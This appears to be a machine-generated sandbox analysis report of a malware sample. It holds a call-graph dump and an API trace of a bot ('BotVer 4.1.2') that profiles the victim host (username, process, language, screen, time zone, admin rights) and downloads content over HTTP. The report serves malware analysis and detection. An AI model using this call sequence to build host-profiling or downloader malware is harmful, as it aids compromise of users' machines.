2bd8ab0 8 API calls 83395->83396 83397 2bd8357 83396->83397 83398 2bd8ab0 8 API calls 83397->83398 83399 2bd836b 83398->83399 83400 2bd8ab0 8 API calls 83399->83400 83401 2bd837f 83400->83401 83402 2bd8ab0 8 API calls 83401->83402 83403 2bd8393 83402->83403 83404 2bd8ab0 8 API calls 83403->83404 83405 2bd83a7 83404->83405 83406 2bd8ab0 8 API calls 83405->83406 83407 2bd83bb 83406->83407 83408 2bd8ab0 8 API calls 83407->83408 83409 2bd83cf 83408->83409 83410 2bd8ab0 8 API calls 83409->83410 83411 2bd83e3 83410->83411 83412 2bd8ab0 8 API calls 83411->83412 83413 2bd83f7 83412->83413 83414 2bd8ab0 8 API calls 83413->83414 83415 2bd840b 83414->83415 83416 2bd8ab0 8 API calls 83415->83416 83417 2bd8421 83416->83417 83418 2bd8ab0 8 API calls 83417->83418 83419 2bd8435 83418->83419 83420 2bd8ab0 8 API calls 83419->83420 83421 2bd844b 83420->83421 83422 2bd8ab0 8 API calls 83421->83422 83423 2bd845f 83422->83423 83424 2bd8ab0 8 API calls 83423->83424 83425 2bd8475 83424->83425 83426 2bd8ab0 8 API calls 83425->83426 83427 2bd8489 83426->83427 83428 2bd8ab0 8 API calls 83427->83428 83429 2bd849d 83428->83429 83430 2bd8ab0 8 API calls 83429->83430 83431 2bd84b1 83430->83431 83432 2bd8ab0 8 API calls 83431->83432 83433 2bd84c5 83432->83433 83434 2bd8ab0 8 API calls 83433->83434 83435 2bd84d9 83434->83435 83436 2bd8ab0 8 API calls 83435->83436 83437 2bd84ed 83436->83437 83438 2bd8ab0 8 API calls 83437->83438 83439 2bd8501 83438->83439 83440 2bd8ab0 8 API calls 83439->83440 83441 2bd8515 83440->83441 83442 2bd8ab0 8 API calls 83441->83442 83443 2bd8529 83442->83443 83444 2bd8ab0 8 API calls 83443->83444 83445 2bd853d 83444->83445 83446 2bd8ab0 8 API calls 83445->83446 83447 2bd8551 83446->83447 83448 2bd8ab0 8 API calls 83447->83448 83449 2bd8565 83448->83449 83450 2bd857b 83449->83450 83451 2bd8ab0 8 API calls 83449->83451 83452 2bd85b1 83450->83452 83453 2bd8596 83450->83453 83454 2bd8ab0 8 API calls 83450->83454 83451->83450 83452->83354 83453->83452 83455 2bd8ab0 8 API calls 83453->83455 83454->83453 83455->83452 83457 2bd8ab0 8 API calls 83456->83457 83458 2bd85e9 83457->83458 83459 2bd8ab0 8 API calls 83458->83459 83460 2bd85fa 83459->83460 83461 2bd8ab0 8 API calls 83460->83461 83462 2bd860b 83461->83462 83463 2bd8ab0 8 API calls 83462->83463 83464 2bd861c 83463->83464 83465 2bd8ab0 8 API calls 83464->83465 83466 2bd862d 83465->83466 83467 2bd8ab0 8 API calls 83466->83467 83468 2bd863e 83467->83468 83469 2bd8ab0 8 API calls 83468->83469 83470 2bd864f 83469->83470 83471 2bd8ab0 8 API calls 83470->83471 83472 2bd8660 83471->83472 83473 2bd8ab0 8 API calls 83472->83473 83474 2bd8673 83473->83474 83475 2bd8ab0 8 API calls 83474->83475 83476 2bd868c 83475->83476 83477 2bd8ab0 8 API calls 83476->83477 83478 2bd869f 83477->83478 83479 2bd8ab0 8 API calls 83478->83479 83480 2bd86b2 83479->83480 83481 2bd8ab0 8 API calls 83480->83481 83482 2bd86c5 83481->83482 83483 2bd8ab0 8 API calls 83482->83483 83484 2bd86db 83483->83484 83485 2bd8ab0 8 API calls 83484->83485 83486 2bd86f1 83485->83486 83487 2bd8ab0 8 API calls 83486->83487 83488 2bd8707 83487->83488 83489 2bd8ab0 8 API calls 83488->83489 83490 2bd8717 83489->83490 83491 2bd8ab0 8 API calls 83490->83491 83492 2bd872c 83491->83492 83493 2bd8ab0 8 API calls 83492->83493 83494 2bd8741 83493->83494 83495 2bd8ab0 8 API calls 83494->83495 83496 2bd8754 83495->83496 83497 2bd8ab0 8 API calls 83496->83497 83498 2bd8765 83497->83498 83499 2bd8ab0 8 API calls 83498->83499 83500 2bd8776 83499->83500 83500->83356 83502 2bb75e6 83501->83502 83503 2bb74b5 CreateFileA 83501->83503 83505 2bb75ed IsBadWritePtr 83502->83505 83506 2bb75fc 83502->83506 83503->83502 83504 2bb74d7 GetFileSizeEx 83503->83504 83508 2bb74f5 83504->83508 83514 2bb75b5 83504->83514 83505->83506 83506->83034 83506->83035 83506->83037 83506->83038 83507 2bb75ca GetHandleInformation 83507->83502 83509 2bb75d9 83507->83509 83510 2bb752f 83508->83510 83511 2bb7501 GetProcessHeap RtlAllocateHeap 83508->83511 83509->83502 83512 2bb75df CloseHandle 83509->83512 83510->83514 83515 2bb754c SetFilePointer LockFile ReadFile UnlockFile 83510->83515 83516 2bb7591 GetProcessHeap HeapValidate 83510->83516 83511->83510 83513 2bb7520 memset 83511->83513 83512->83502 83513->83510 83514->83502 83514->83507 83515->83514 83515->83516 83516->83514 83517 2bb75a5 GetProcessHeap HeapFree 83516->83517 83517->83514 83519 2bb6ce9 RegQueryValueExA 83518->83519 83520 2bb6db4 83518->83520 83519->83520 83523 2bb6d10 83519->83523 83521 2bb6dbb RegCloseKey 83520->83521 83522 2bb6dc2 83520->83522 83521->83522 83524 2bb6dd5 83522->83524 83587 2bb6b10 memset memset RegOpenKeyExA 83522->83587 83523->83520 83527 2bb6d73 GetProcessHeap HeapAlloc 83523->83527 83524->83042 83527->83520 83528 2bb6d8d memset 83527->83528 83528->83520 83529 2bb6da1 lstrcpynA 83528->83529 83529->83520 83531 2bc4f75 83530->83531 83532 2bc4b03 83530->83532 83531->83045 83532->83531 83533 2bc4bb0 InternetOpenA 83532->83533 83536 2bc4b1e GetProcessHeap HeapAlloc 83532->83536 83537 2bc4b49 83532->83537 83534 2bc4f1a 83533->83534 83535 2bc4bd3 InternetConnectA 83533->83535 83543 2bc4f27 GetProcessHeap HeapValidate 83534->83543 83544 2bc4f43 83534->83544 83535->83534 83538 2bc4bf2 HttpOpenRequestA 83535->83538 83539 2bc4b3a memset 83536->83539 83540 2bc4b46 83536->83540 83537->83531 83541 2bc4b54 memcpy 83537->83541 83538->83534 83545 2bc4c2a 83538->83545 83539->83540 83540->83537 83559 2bc4b70 83541->83559 83543->83544 83546 2bc4f37 GetProcessHeap HeapFree 83543->83546 83547 2bc4f4f InternetCloseHandle 83544->83547 83548 2bc4f55 83544->83548 83549 2bc4c4e 83545->83549 83554 2bc4c3b HttpAddRequestHeadersA 83545->83554 83546->83544 83547->83548 83550 2bc4f5c InternetCloseHandle 83548->83550 83551 2bc4f5f 83548->83551 83555 2bc4c51 HttpAddRequestHeadersA 83549->83555 83550->83551 83552 2bc4f69 83551->83552 83553 2bc4f66 InternetCloseHandle 83551->83553 83552->83045 83553->83552 83554->83555 83556 2bc4c96 HttpSendRequestA 83555->83556 83557 2bc4c66 _snprintf HttpAddRequestHeadersA 83555->83557 83556->83534 83560 2bc4cb8 HttpQueryInfoA 83556->83560 83557->83556 83559->83533 83560->83534 83561 2bc4cdb 83560->83561 83561->83534 83562 2bc4ce8 CreateFileA 83561->83562 83562->83534 83563 2bc4d16 83562->83563 83564 2bd5930 8 API calls 83563->83564 83565 2bc4d1b 83564->83565 83566 2bc4d1f ConvertStringSecurityDescriptorToSecurityDescriptorW 83565->83566 83567 2bc4d76 GetProcessHeap RtlAllocateHeap 83565->83567 83566->83567 83568 2bc4d36 GetSecurityDescriptorSacl 83566->83568 83569 2bc4e5a 83567->83569 83570 2bc4d96 memset InternetReadFile 83567->83570 83575 2bc4d6c LocalFree 83568->83575 83576 2bc4d57 SetNamedSecurityInfoA 83568->83576 83573 2bc4e5e GetHandleInformation 83569->83573 83574 2bc4e81 83569->83574 83571 2bc4e3e GetProcessHeap HeapValidate 83570->83571 83572 2bc4dc5 83570->83572 83571->83569 83578 2bc4e4e GetProcessHeap HeapFree 83571->83578 83572->83571 83577 2bc4dcc 6 API calls 83572->83577 83573->83574 83579 2bc4e74 83573->83579 83580 2bb74a0 16 API calls 83574->83580 83575->83567 83576->83575 83577->83567 83581 2bc4e29 GetProcessHeap RtlFreeHeap 83577->83581 83578->83569 83579->83574 83582 2bc4e7a CloseHandle 83579->83582 83583 2bc4e91 83580->83583 83581->83567 83582->83574 83583->83534 83596 2bb7350 83583->83596 83585 2bc4efc GetProcessHeap HeapValidate 83585->83534 83586 2bc4f0c GetProcessHeap RtlFreeHeap 83585->83586 83586->83534 83588 2bb6b88 RegQueryValueExA 83587->83588 83589 2bb6c54 83587->83589 83588->83589 83592 2bb6baf 83588->83592 83590 2bb6c5b RegCloseKey 83589->83590 83591 2bb6c62 83589->83591 83590->83591 83591->83042 83592->83589 83593 2bb6c13 GetProcessHeap HeapAlloc 83592->83593 83593->83589 83594 2bb6c2d memset 83593->83594 83594->83589 83595 2bb6c41 lstrcpynA 83594->83595 83595->83589 83597 2bb736b 83596->83597 83598 2bb748e 83596->83598 83597->83598 83599 2bb737c CreateFileA 83597->83599 83598->83585 83599->83598 83600 2bb739e 83599->83600 83601 2bd5930 8 API calls 83600->83601 83602 2bb73a3 83601->83602 83603 2bb73fe SetFilePointer LockFile WriteFile UnlockFile 83602->83603 83604 2bb73a7 ConvertStringSecurityDescriptorToSecurityDescriptorW 83602->83604 83606 2bb7459 83603->83606 83607 2bb7449 SetEndOfFile 83603->83607 83604->83603 83605 2bb73be GetSecurityDescriptorSacl 83604->83605 83608 2bb73df SetNamedSecurityInfoA 83605->83608 83609 2bb73f4 LocalFree 83605->83609 83610 2bb7483 83606->83610 83611 2bb7467 GetHandleInformation 83606->83611 83607->83606 83608->83609 83609->83603 83610->83585 83611->83610 83612 2bb7476 83611->83612 83612->83610 83613 2bb747c CloseHandle 83612->83613 83613->83610 83614 2bd5a50 GetSystemWindowsDirectoryA 83615 2bd5a90 83614->83615 83615->83615 83616 2bd5a97 GetVolumeInformationA 83615->83616 83617 2bd5ad8 83616->83617 83618 2bd5b1b _snprintf 83617->83618 83619 2bd5b51 _snprintf 83617->83619 83618->83617 83621 2bd5b9e 83619->83621

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                Function 02BB4B00 Relevance: 325.1, APIs: 164, Strings: 21, Instructions: 1343filetimeCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 2bb4b00-2bb4c42 CreateFileA 1 2bb592a-2bb5930 0->1 2 2bb4c48-2bb4d79 call 2bd59d0 SetFilePointer LockFile WriteFile UnlockFile SetFilePointer LockFile WriteFile UnlockFile SetFilePointer LockFile WriteFile UnlockFile GetModuleFileNameA SetFilePointer LockFile WriteFile UnlockFile 0->2 5 2bb4d80-2bb4d85 2->5 5->5 6 2bb4d87-2bb4d93 5->6 7 2bb4dd8-2bb4e73 SetFilePointer LockFile WriteFile UnlockFile GetUserNameA SetFilePointer LockFile WriteFile UnlockFile 6->7 8 2bb4d95-2bb4dd2 SetFilePointer LockFile WriteFile UnlockFile 6->8 9 2bb4e76-2bb4e7b 7->9 8->7 9->9 10 2bb4e7d-2bb4e89 9->10 11 2bb4e8b-2bb4ec8 SetFilePointer LockFile WriteFile UnlockFile 10->11 12 2bb4ece-2bb4f6f SetFilePointer LockFile WriteFile UnlockFile GetEnvironmentVariableA SetFilePointer LockFile WriteFile UnlockFile 10->12 11->12 13 2bb4f72-2bb4f77 12->13 13->13 14 2bb4f79-2bb4f85 13->14 15 2bb4fca-2bb502e SetFilePointer LockFile WriteFile UnlockFile GetSystemDefaultLangID memset 14->15 16 2bb4f87-2bb4fc4 SetFilePointer LockFile WriteFile UnlockFile 14->16 17 2bb5030-2bb503a 15->17 16->15 18 2bb503c-2bb5040 17->18 19 2bb5044-2bb505a 17->19 18->17 20 2bb5042 18->20 21 2bb5060-2bb5069 19->21 20->21 22 2bb5070-2bb5075 21->22 22->22 23 2bb5077-2bb5079 22->23 24 2bb507b 23->24 25 2bb5085-2bb50cd SetFilePointer LockFile WriteFile UnlockFile 23->25 24->25 26 2bb50d0-2bb50d5 25->26 26->26 27 2bb50d7-2bb50e3 26->27 28 2bb5128-2bb51f0 SetFilePointer LockFile WriteFile UnlockFile GetDC GetDeviceCaps GetSystemMetrics * 2 _snprintf SetFilePointer LockFile WriteFile UnlockFile 27->28 29 2bb50e5-2bb5122 SetFilePointer LockFile WriteFile UnlockFile 27->29 30 2bb51f3-2bb51f8 28->30 29->28 30->30 31 2bb51fa-2bb5206 30->31 32 2bb524b-2bb52f5 SetFilePointer LockFile WriteFile UnlockFile GetDateFormatA SetFilePointer LockFile WriteFile UnlockFile 31->32 33 2bb5208-2bb5245 SetFilePointer LockFile WriteFile UnlockFile 31->33 34 2bb52f8-2bb52fd 32->34 33->32 34->34 35 2bb52ff-2bb530b 34->35 36 2bb530d-2bb534a SetFilePointer LockFile WriteFile UnlockFile 35->36 37 2bb5350-2bb53fd SetFilePointer LockFile WriteFile UnlockFile GetTimeFormatA SetFilePointer LockFile WriteFile UnlockFile 35->37 36->37 38 2bb5400-2bb5405 37->38 38->38 39 2bb5407-2bb5413 38->39 40 2bb5458-2bb5553 SetFilePointer LockFile WriteFile UnlockFile GetTimeZoneInformation _snprintf SetFilePointer LockFile WriteFile UnlockFile 39->40 41 2bb5415-2bb5452 SetFilePointer LockFile WriteFile UnlockFile 39->41 42 2bb5556-2bb555b 40->42 41->40 42->42 43 2bb555d-2bb5569 42->43 44 2bb556b-2bb55a8 SetFilePointer LockFile WriteFile UnlockFile 43->44 45 2bb55ae-2bb563a SetFilePointer LockFile WriteFile UnlockFile SetFilePointer LockFile WriteFile UnlockFile call 2bb4100 43->45 44->45 48 2bb5640-2bb5645 45->48 48->48 49 2bb5647-2bb565d call 2bb4100 48->49 52 2bb565f-2bb5663 49->52 53 2bb56a5-2bb5741 SetFilePointer LockFile WriteFile UnlockFile GetSystemWindowsDirectoryA SetFilePointer LockFile WriteFile UnlockFile 49->53 52->53 55 2bb5665-2bb569f SetFilePointer LockFile WriteFile UnlockFile 52->55 54 2bb5744-2bb5749 53->54 54->54 56 2bb574b-2bb5757 54->56 55->53 57 2bb5759-2bb5796 SetFilePointer LockFile WriteFile UnlockFile 56->57 58 2bb579c-2bb582d SetFilePointer LockFile WriteFile UnlockFile SetFilePointer LockFile WriteFile UnlockFile IsUserAnAdmin 56->58 57->58 59 2bb582f 58->59 60 2bb5834 58->60 59->60 61 2bb5837-2bb583c 60->61 61->61 62 2bb583e-2bb5852 IsUserAnAdmin 61->62 63 2bb585b-2bb5866 62->63 64 2bb5854 62->64 65 2bb5868-2bb586c 63->65 66 2bb58ae-2bb58fe SetFilePointer LockFile WriteFile UnlockFile call 2bb4900 call 2bb4180 call 2bb44d0 call 2bb4710 63->66 64->63 65->66 67 2bb586e-2bb58a8 SetFilePointer LockFile WriteFile UnlockFile 65->67 75 2bb5903-2bb590c 66->75 67->66 75->1 76 2bb590e-2bb591b GetHandleInformation 75->76 76->1 77 2bb591d-2bb5921 76->77 77->1 78 2bb5923-2bb5924 CloseHandle 77->78 78->1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,02C0D3A4,75495CE0), ref: 02BB4C37
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000001), ref: 02BB4C5E
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB4C6F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02BB3F9D,00000000), ref: 02BB4C7F
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02BB4C90
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4CA4
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02BB4CB1
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,4.1.2,00000005,00000000,00000000), ref: 02BB4CC1
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02BB4CD2
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4CE6
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4CF3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4D03
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02BB4D14
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BB4D28
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4D3C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02BB4D49
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02BB4D59
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02BB4D6A
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4D9C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4DAB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4DBF
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB4DD2
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4DE6
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4DF3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4E03
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4E14
                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,00000104), ref: 02BB4E25
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4E39
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB4E46
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02BB4E56
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB4E67
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4E92
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4EA1
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4EB5
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4EC8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4EDC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4EE9
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4EF9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4F0A
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02BB4F21
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4F35
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB4F42
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02BB4F52
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB4F63
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4F8E
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4F9D
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4FB1
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4FC4
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4FD8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4FE5
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4FF5
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5006
                                                                                                                                                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 02BB500C
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB5026
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5093
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB50A0
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 02BB50B0
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB50C1
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB50EC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB50FB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB510F
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5122
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5136
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5143
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5153
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5164
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 02BB516E
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 02BB5175
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 02BB517E
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 02BB5187
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB519F
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB51B6
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB51C3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 02BB51D3
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB51E4
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB520F
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB521E
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5232
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5245
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5259
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5266
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5276
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5287
                                                                                                                                                                                                                • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02BB52A7
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB52BB
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02BB52C8
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 02BB52D8
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02BB52E9
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5314
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5323
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5337
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB534A
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB535E
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB536B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB537B
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB538C
                                                                                                                                                                                                                • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02BB53AC
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB53C0
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02BB53CD
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 02BB53DD
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02BB53EE
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB541C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB542B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB543F
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5452
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5466
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5473
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5483
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5494
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?), ref: 02BB54A1
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB5502
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5519
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02BB5526
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02BB5536
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02BB5547
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5572
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5581
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5595
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB55A8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB55BC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB55C9
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB55D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB55EA
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB55FE
